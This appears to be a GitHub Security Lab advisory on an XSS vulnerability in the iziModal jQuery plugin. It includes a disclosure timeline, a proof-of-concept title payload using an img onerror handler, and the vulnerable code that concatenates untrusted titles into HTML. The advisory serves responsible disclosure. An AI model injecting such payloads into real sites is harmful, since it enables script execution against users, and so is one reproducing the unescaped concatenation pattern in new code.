Coordinated Disclosure Timeline
- 2021-11-24: Maintainer contacted.
- 2022-04-12: Maintainer contacted.
- 2022-04-29: Public issue created asking for a security contact.
- 2022-05-26: Updated the public issue with our intention to publish the advisory due to the lack of response.
- 2022-05-30: Maintainer fixed the issue.
Summary
iziModal is prone to XSS when handling untrusted modal titles.
Product
iziModal
Tested Version
Details
An attacker who is able to influence the field title when creating a iziModal instance is able to supply arbitrary html or javascript code that will be rendered in the context of a user, potentially leading to XSS.
Proof of concept snippet:
$("#modal").iziModal({
title: '<img src="foobar" onerror="alert(6)" />',
subtitle: 'Blabity'
});
$(document).on('click', '.trigger', function (event) {
event.preventDefault();
$('#modal').iziModal('open');
});
Vulnerable code: iziModal.js
createHeader: function(){
this.$header = $('<div class="'+PLUGIN_NAME+'-header"><h2 class="'+PLUGIN_NAME+'-header-title">' +
this.options.title +
'</h2><p class="'+PLUGIN_NAME+'-header-subtitle">' + this.options.subtitle +
'</p><div class="'+PLUGIN_NAME+'-header-buttons"></div></div>');
Impact
This issue may lead to XSS
Resources
- Proof of concept
- https://github.com/marcelodolza/iziModal/issues/249
- https://github.com/marcelodolza/iziModal/commit/01728ac52bac5c1b4512087dafe0ad8b091fdc9e
Credit
This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1044 in any communication regarding this issue.